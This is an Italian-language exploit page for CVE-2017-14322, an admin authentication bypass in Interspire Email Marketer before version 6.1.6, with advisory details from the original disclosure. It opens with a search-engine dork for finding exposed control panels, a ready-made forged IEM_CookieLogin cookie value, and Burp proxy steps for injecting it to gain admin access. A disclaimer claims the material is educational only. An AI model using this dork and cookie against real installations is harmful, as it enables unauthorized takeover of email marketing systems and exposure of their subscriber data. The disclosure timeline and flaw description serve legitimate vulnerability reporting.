
CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit
intitle:"Control Panel" + emailmarketer
Aggiungi una regola Match and Replace per l'header della Request come di seguito:
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D
Quando apri il sito, non funzionerà al primo tentativo perché l'header Cookie non è presente. Aggiorna il sito una seconda volta usando il proxy Burp con la regola aggiunta sopra e vedrai ciò che volevi. Assicurati di spuntare "Intercept Client Requests"
Interspire Email Marketer - Bypass dell'autenticazione remota dell'admin
Hakan Küsne, Infoteam Security (CH)
CVE-2017-14322
CVSS Base Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O
2017-09-12 Vulnerabilità scoperta 2017-09-12 Scoperto che il vendor aveva già corretto la vulnerabilità ma non lo aveva mai comunicato ai clienti, lasciando centinaia di sistemi vulnerabili in the wild 2017-10-17 Divulgazione pubblica
Interspire Email Marketer precedente alla versione 6.1.6
http://www.interspire.com/emailmarketer/
La funzione incaricata di verificare se l'utente è già connesso, init.php in Interspire Email Marketer (IEM) precedente alla 6.1.6, consente a un attaccante remoto di bypassare l'autenticazione e ottenere accesso amministrativo utilizzando il cookie IEM_CookieLogin con un valore appositamente costruito. Inoltre, se il cliente non dispone di un piano di manutenzione annuale, l'applicazione dichiara di essere all'ultima versione disponibile e che non ci sono aggiornamenti.
Le vulnerabilità sono state scoperte durante un incident response su un'istanza compromessa dell'applicazione.
Dettagli forniti qui: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
Il vendor ha corretto la vulnerabilità nella versione 6.1.6, ma non l'ha mai comunicato specificamente ai propri clienti.
Questo exploit è solo a scopo educativo e non siamo responsabili delle tue azioni.